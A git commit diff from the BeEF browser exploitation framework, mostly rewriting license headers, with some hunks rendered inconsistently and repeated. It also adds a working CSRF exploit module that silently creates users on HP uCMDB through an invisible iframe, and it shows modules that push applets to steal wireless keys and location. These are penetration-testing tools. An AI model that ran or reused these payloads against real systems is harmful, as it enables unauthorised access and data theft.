More changed license headers

2012-11-02 15:27:01 +10:00
parent 23f09b919f
commit d2188b230c
27 changed files with 317 additions and 559 deletions
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -1,18 +1,8 @@
 ===============================================================================
-   Copyright 2012 Wade Alcorn wade@bindshell.net
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
-   Licensed under the Apache License, Version 2.0 (the "License");
+    See the file 'doc/COPYING' for copying permission
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
 ===============================================================================
--- a/158
+++ b/158
@@ -1,84 +1,74 @@
-===============================================================================
+===============================================================================
-   
+   
-   Copyright 2012 Wade Alcorn wade@bindshell.net
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
-   Licensed under the Apache License, Version 2.0 (the "License");
+    See the file 'doc/COPYING' for copying permission
-   you may not use this file except in compliance with the License.
+
-   You may obtain a copy of the License at
+===============================================================================
-
+
-       http://www.apache.org/licenses/LICENSE-2.0
+What is BeEF?
-
+-------------
-   Unless required by applicable law or agreed to in writing, software
+
-   distributed under the License is distributed on an "AS IS" BASIS,
+BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
-   See the License for the specific language governing permissions and
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
-   limitations under the License.
+
-
+
-===============================================================================
+Get Involved 
-
+------------
-What is BeEF?
+
-------------
+You can get in touch with the BeEF team. Just check out the following: 
-
+
-BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
+
-
+Please, send us pull requests!
-Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
-
+Web: http://beefproject.com/
-
+
-Get Involved 
+Mail: beef-subscribe@bindshell.net
------------
+
-
+IRC: ircs://irc.freenode.net/beefproject
-You can get in touch with the BeEF team. Just check out the following: 
+
-
+Twitter: @beefproject
-
+
-Please, send us pull requests!
+
-
+Requirements
-Web: http://beefproject.com/
+------------
-
+
-Mail: beef-subscribe@bindshell.net
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
-IRC: ircs://irc.freenode.net/beefproject
+* [SQLite](http://sqlite.org) 3.x
-
+* The following GEMS: 
-Twitter: @beefproject
+   - bundler 
-
+   - thin
-
+   - Sinatra 
-Requirements
+   - ANSI 
------------
+   - TERM-ANSIcolor 
-
+   - dm-core 
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+   - json 
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+   - data_objects 
-* [SQLite](http://sqlite.org) 3.x
+   - dm-sqlite-adapter 
-* The following GEMS: 
+   - parseconfig 
-   - bundler 
+   - erubis 
-   - thin
+   - dm-migrations 
-   - Sinatra 
+   - msfrpc-client 
-   - ANSI 
+   - eventmachine
-   - TERM-ANSIcolor 
+   - win32console (Windows Only)
-   - dm-core 
+
-   - json 
+
-   - data_objects 
+Quick Start
-   - dm-sqlite-adapter 
+----------- 
-   - parseconfig 
+
-   - erubis 
+__The following is for the impatient.__ 
-   - dm-migrations 
+
-   - msfrpc-client 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
-   - eventmachine
+
-   - win32console (Windows Only)
+   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
-
+
-
+
-Quick Start
+Usage 
----------- 
+----- 
-
+
-__The following is for the impatient.__ 
+To get started, simply execute beef and follow the instrustions: 
-
+
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+   $ ./beef
-
+
   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
 Usage 
 ----- 
 To get started, simply execute beef and follow the instrustions: 
   $ ./beef
--- a/README.mkd
+++ b/README.mkd
@@ -1,84 +1,74 @@
-===============================================================================
+===============================================================================
-   
+   
-   Copyright 2012 Wade Alcorn wade@bindshell.net
+    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
-   Licensed under the Apache License, Version 2.0 (the "License");
+    See the file 'doc/COPYING' for copying permission
-   you may not use this file except in compliance with the License.
+
-   You may obtain a copy of the License at
+===============================================================================
-
+
-       http://www.apache.org/licenses/LICENSE-2.0
+What is BeEF?
-
+-------------
-   Unless required by applicable law or agreed to in writing, software
+
-   distributed under the License is distributed on an "AS IS" BASIS,
+__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
-   See the License for the specific language governing permissions and
+Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
-   limitations under the License.
+
-
+
-===============================================================================
+Get Involved 
-
+------------
-What is BeEF?
+
-------------
+You can get in touch with the BeEF team. Just check out the following: 
-
+
-__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
+
-
+__Please, send us pull requests!__
-Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
+
-
+__Web:__ http://beefproject.com/
-
+
-Get Involved 
+__Mail:__ beef-subscribe@bindshell.net
------------
+
-
+__IRC:__ ircs://irc.freenode.net/beefproject
-You can get in touch with the BeEF team. Just check out the following: 
+
-
+__Twitter:__ @beefproject
-
+
-__Please, send us pull requests!__
+
-
+Requirements
-__Web:__ http://beefproject.com/
+------------
-
+
-__Mail:__ beef-subscribe@bindshell.net
+* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-
+* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
-__IRC:__ ircs://irc.freenode.net/beefproject
+* [SQLite](http://sqlite.org) 3.x
-
+* The following GEMS: 
-__Twitter:__ @beefproject
+   - bundler 
-
+   - thin
-
+   - Sinatra 
-Requirements
+   - ANSI 
------------
+   - TERM-ANSIcolor 
-
+   - dm-core 
-* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
+   - json 
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+   - data_objects 
-* [SQLite](http://sqlite.org) 3.x
+   - dm-sqlite-adapter 
-* The following GEMS: 
+   - parseconfig 
-   - bundler 
+   - erubis 
-   - thin
+   - dm-migrations 
-   - Sinatra 
+   - msfrpc-client 
-   - ANSI 
+   - eventmachine
-   - TERM-ANSIcolor 
+   - win32console (Windows Only)
-   - dm-core 
+
-   - json 
+
-   - data_objects 
+Quick Start
-   - dm-sqlite-adapter 
+----------- 
-   - parseconfig 
+
-   - erubis 
+__The following is for the impatient.__ 
-   - dm-migrations 
+
-   - msfrpc-client 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
-   - eventmachine
+
-   - win32console (Windows Only)
+       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
-
+
-
+
-Quick Start
+Usage 
----------- 
+----- 
-
+
-__The following is for the impatient.__ 
+To get started, simply execute beef and follow the instructions: 
-
+
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+       $ ./beef
-
+
       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
 Usage 
 ----- 
 To get started, simply execute beef and follow the instructions: 
       $ ./beef
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 #   Licensed under the Apache License, Version 2.0 (the "License");
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 # @note Include here all the gems we are using
 require 'rubygems'
--- a/core/main/handlers/modules/command.rb
+++ b/core/main/handlers/modules/command.rb
@@ -51,19 +51,11 @@ module BeEF
            #todo antisnatchor: remove this gsub crap adding some hook packing.
            if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session)
              #content = command_module.output.gsub('//
              #//   Copyright 2012 Wade Alcorn wade@bindshell.net
              #//
-              #//   Licensed under the Apache License, Version 2.0 (the "License");
+              #//   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-              #//   you may not use this file except in compliance with the License.
+              #//   Browser Exploitation Framework (BeEF) - http://beefproject.com
-              #//   You may obtain a copy of the License at
+              #//   See the file 'doc/COPYING' for copying permission
              #//
              #//       http://www.apache.org/licenses/LICENSE-2.0
              #//
              #//   Unless required by applicable law or agreed to in writing, software
              #//   distributed under the License is distributed on an "AS IS" BASIS,
              #//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
              #//   See the License for the specific language governing permissions and
              #//   limitations under the License.
              #//', "")
              ws.send(@output, hooked_browser.session)
            else
--- a/extensions/admin_ui/media/css/base.css
+++ b/extensions/admin_ui/media/css/base.css
@@ -1,18 +1,9 @@
 /*
- *   Copyright 2012 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
- *
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
- *   Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
 *   you may not use this file except in compliance with the License.
 *   You may obtain a copy of the License at
 *
 *       http://www.apache.org/licenses/LICENSE-2.0
 *
 *   Unless required by applicable law or agreed to in writing, software
 *   distributed under the License is distributed on an "AS IS" BASIS,
 *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 *   See the License for the specific language governing permissions and
 *   limitations under the License.
 */
 #header .right-menu {
 	float: right;
 	margin: 10px;
--- a/extensions/admin_ui/media/css/ext-all.css
+++ b/extensions/admin_ui/media/css/ext-all.css
@@ -1,18 +1,9 @@
 /*
- *   Copyright 2012 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
- *
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
- *   Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
 *   you may not use this file except in compliance with the License.
 *   You may obtain a copy of the License at
 *
 *       http://www.apache.org/licenses/LICENSE-2.0
 *
 *   Unless required by applicable law or agreed to in writing, software
 *   distributed under the License is distributed on an "AS IS" BASIS,
 *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 *   See the License for the specific language governing permissions and
 *   limitations under the License.
 */
 /*!
 * Ext JS Library 3.3.1
 * Copyright(c) 2006-2010 Sencha Inc.
--- a/extensions/admin_ui/media/css/wterm.css
+++ b/extensions/admin_ui/media/css/wterm.css
@@ -1,18 +1,9 @@
 /*
- *   Copyright 2012 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
- *
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
- *   Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
 *   you may not use this file except in compliance with the License.
 *   You may obtain a copy of the License at
 *
 *       http://www.apache.org/licenses/LICENSE-2.0
 *
 *   Unless required by applicable law or agreed to in writing, software
 *   distributed under the License is distributed on an "AS IS" BASIS,
 *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 *   See the License for the specific language governing permissions and
 *   limitations under the License.
 */
 /* Basic Terminal CSS */
 .wterm_terminal {  background: #000; color: #fff; font-size: 1em; font-family: monospace; padding: 3px; width: 100%; height: 100%; display: block; overflow-x: none; overflow-y: auto;  }
--- a/extensions/demos/html/butcher/butch.css
+++ b/extensions/demos/html/butcher/butch.css
@@ -1,18 +1,9 @@
 /*
- *   Copyright 2012 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
- *
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
- *   Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
 *   you may not use this file except in compliance with the License.
 *   You may obtain a copy of the License at
 *
 *       http://www.apache.org/licenses/LICENSE-2.0
 *
 *   Unless required by applicable law or agreed to in writing, software
 *   distributed under the License is distributed on an "AS IS" BASIS,
 *   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 *   See the License for the specific language governing permissions and
 *   limitations under the License.
 */
 html {
 	height: 100%;
 }
--- a/extensions/notifications/notifications.rb
+++ b/extensions/notifications/notifications.rb
@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 #   Licensed under the Apache License, Version 2.0 (the "License");
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 require 'extensions/notifications/channels/tweet'
 require 'extensions/notifications/channels/email'
--- a/extensions/requester/api/hook.rb
+++ b/extensions/requester/api/hook.rb
@@ -3,6 +3,7 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Extension
    module Requester
@@ -31,19 +32,9 @@ module BeEF
            #todo antisnatchor: remove this gsub crap adding some hook packing.
            if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
              content = File.read(find_beefjs_component_path 'beef.net.requester').gsub('//
-              //   Copyright 2012 Wade Alcorn wade@bindshell.net
+              //   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-              //
+              //   Browser Exploitation Framework (BeEF) - http://beefproject.com
-              //   Licensed under the Apache License, Version 2.0 (the "License");
+              //   See the file \'doc/COPYING\' for copying permission
              //   you may not use this file except in compliance with the License.
              //   You may obtain a copy of the License at
              //
              //       http://www.apache.org/licenses/LICENSE-2.0
              //
              //   Unless required by applicable law or agreed to in writing, software
              //   distributed under the License is distributed on an "AS IS" BASIS,
              //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
              //   See the License for the specific language governing permissions and
              //   limitations under the License.
              //', "")
              add_to_body output
              ws.send(content + @body,hb.session)
--- a/extensions/xssrays/api/scan.rb
+++ b/extensions/xssrays/api/scan.rb
@@ -43,19 +43,9 @@ module BeEF
            # todo antisnatchor: remove this gsub crap adding some hook packing.
            if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session)
              content = File.read(find_beefjs_component_path 'beef.net.xssrays').gsub('//
-              //   Copyright 2012 Wade Alcorn wade@bindshell.net
+              //   Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-              //
+              //   Browser Exploitation Framework (BeEF) - http://beefproject.com
-              //   Licensed under the Apache License, Version 2.0 (the "License");
+              //   See the file \'doc/COPYING\' for copying permission
              //   you may not use this file except in compliance with the License.
              //   You may obtain a copy of the License at
              //
              //       http://www.apache.org/licenses/LICENSE-2.0
              //
              //   Unless required by applicable law or agreed to in writing, software
              //   distributed under the License is distributed on an "AS IS" BASIS,
              //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
              //   See the License for the specific language governing permissions and
              //   limitations under the License.
              //', "")
              add_to_body xs.id, hb.session, beefurl, cross_domain, timeout, debug
              ws.send(content + @body,hb.session)
--- a/modules/browser/hooked_domain/ajax_fingerprint/module.rb
+++ b/modules/browser/hooked_domain/ajax_fingerprint/module.rb
@@ -1,17 +1,8 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 #   Licensed under the Apache License, Version 2.0 (the "License");
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 class Ajax_fingerprint < BeEF::Core::Command
--- a/modules/exploits/hp_ucmdb_add_user_csrf/command.js
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
@@ -1,41 +1,32 @@
-//
+/*
-// Copyright 2012 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-//
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
-// Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
-// you may not use this file except in compliance with the License.
+ */
-// You may obtain a copy of the License at
+
-//
+beef.execute(function() {	
-// http://www.apache.org/licenses/LICENSE-2.0
+var protocol = '<%= @protocol %>';
-//
+var host = '<%= @host %>';
-// Unless required by applicable law or agreed to in writing, software
+var port = '<%= @port %>';
-// distributed under the License is distributed on an "AS IS" BASIS,
+var usertype = '<%= @usertype %>';
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+var customerid = '<%= @customerid %>';
-// See the License for the specific language governing permissions and
+var username = '<%= @username %>';
-// limitations under the License.
+var password = '<%= @password %>';
-//
+
-beef.execute(function() {	
+var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
-var protocol = '<%= @protocol %>';
+url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
-var host = '<%= @host %>';
+
-var port = '<%= @port %>';
+if (usertype == 'createIntegrationUser'){
-var usertype = '<%= @usertype %>';
+	url += '&arg3=';
-var customerid = '<%= @customerid %>';
+}
-var username = '<%= @username %>';
+
-var password = '<%= @password %>';
+var ucmdb_iframe = beef.dom.createInvisibleIframe();
-
+ucmdb_iframe.setAttribute('src', url);
-var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
+
-url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
+cleanup = function() {
-
+    document.body.removeChild(ucmdb_iframe);
-if (usertype == 'createIntegrationUser'){
+}
-	url += '&arg3=';
+setTimeout("cleanup()", 15000);
-}
+
-
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
-var ucmdb_iframe = beef.dom.createInvisibleIframe();
+});
 ucmdb_iframe.setAttribute('src', url);
 cleanup = function() {
    document.body.removeChild(ucmdb_iframe);
 }
 setTimeout("cleanup()", 15000);
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
 });
--- a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
@@ -1,25 +1,15 @@
-#
+#
-# Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
-# you may not use this file except in compliance with the License.
+#
-# You may obtain a copy of the License at
+beef:
-#
+    module:
-# http://www.apache.org/licenses/LICENSE-2.0
+        hp_ucmdb_add_user_csrf:
-#
+            enable: true
-# Unless required by applicable law or agreed to in writing, software
+            category: "Exploits"
-# distributed under the License is distributed on an "AS IS" BASIS,
+            name: "HP uCMDB 9.0x add user CSRF"
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+            description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).<br />For more information please refer to <a href='http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html'>http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html</a>"
-# See the License for the specific language governing permissions and
+            authors: ["Bart Leppens"]
-# limitations under the License.
+            target:
-#
+                working: ["ALL"]
 beef:
    module:
        hp_ucmdb_add_user_csrf:
            enable: true
            category: "Exploits"
            name: "HP uCMDB 9.0x add user CSRF"
            description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).<br />For more information please refer to <a href='http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html'>http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html</a>"
            authors: ["Bart Leppens"]
            target:
                working: ["ALL"]
--- a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
@@ -1,40 +1,31 @@
-#
+#
-# Copyright 2012 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-# Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
-# you may not use this file except in compliance with the License.
+#
-# You may obtain a copy of the License at
+
-#
+class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
-# http://www.apache.org/licenses/LICENSE-2.0
+
-#
+  def self.options
-# Unless required by applicable law or agreed to in writing, software
+    return [
-# distributed under the License is distributed on an "AS IS" BASIS,
+		{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+          'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
-# See the License for the specific language governing permissions and
+          'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
-# limitations under the License.
+        },
-#
+        {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
-class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
+        {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
-
+        { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
-  def self.options
+          'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
-    return [
+          'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
-		{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
+        },
-          'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
+		{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
-          'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
+		{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
-        },
+		{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
-        {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
+    ]
-        {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
+  end
-        { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
+
-          'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
+  def post_execute
-          'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
+    save({'result' => @datastore['result']})
-        },
+  end
-		{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
+
-		{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
+end
 		{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
    ]
  end
  def post_execute
    save({'result' => @datastore['result']})
  end
 end
--- a/modules/host/get_physical_location/command.js
+++ b/modules/host/get_physical_location/command.js
@@ -1,18 +1,9 @@
-//
+/*
-//   Copyright 2011 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-//
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
-//   you may not use this file except in compliance with the License.
+ */
-//   You may obtain a copy of the License at
+
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 beef.execute(function() {
    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
    var applet_id = '<%= @applet_id %>';
--- a/modules/host/get_physical_location/config.yaml
+++ b/modules/host/get_physical_location/config.yaml
@@ -1,18 +1,9 @@
 #
-#   Copyright 2011 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 beef:
    module:
        get_physical_location:
--- a/modules/host/get_physical_location/module.rb
+++ b/modules/host/get_physical_location/module.rb
@@ -1,18 +1,9 @@
 #
-#   Copyright 2011 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
 #   You may obtain a copy of the License at
 #
 #       http://www.apache.org/licenses/LICENSE-2.0
 #
 #   Unless required by applicable law or agreed to in writing, software
 #   distributed under the License is distributed on an "AS IS" BASIS,
 #   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 #   See the License for the specific language governing permissions and
 #   limitations under the License.
 #
 require 'rubygems'
 require 'json'
 require 'open-uri'
--- a/modules/host/get_wireless_keys/command.js
+++ b/modules/host/get_wireless_keys/command.js
@@ -1,18 +1,9 @@
-//
+/*
-//   Copyright 2011 Wade Alcorn wade@bindshell.net
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-//
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
-//   Licensed under the Apache License, Version 2.0 (the "License");
+ * See the file 'doc/COPYING' for copying permission
-//   you may not use this file except in compliance with the License.
+ */
-//   You may obtain a copy of the License at
+
 //
 //       http://www.apache.org/licenses/LICENSE-2.0
 //
 //   Unless required by applicable law or agreed to in writing, software
 //   distributed under the License is distributed on an "AS IS" BASIS,
 //   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 //   See the License for the specific language governing permissions and
 //   limitations under the License.
 //
 beef.execute(function() {
    var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
    var applet_id = '<%= @applet_id %>';
--- a/modules/host/get_wireless_keys/config.yaml
+++ b/modules/host/get_wireless_keys/config.yaml
@@ -1,18 +1,9 @@
 #
-#   Copyright 2011 Wade Alcorn wade@bindshell.net
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
-#
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
-#   Licensed under the Apache License, Version 2.0 (the "License");
+# See the file 'doc/COPYING' for copying permission
 #   you may not use this file except in compliance with the License.
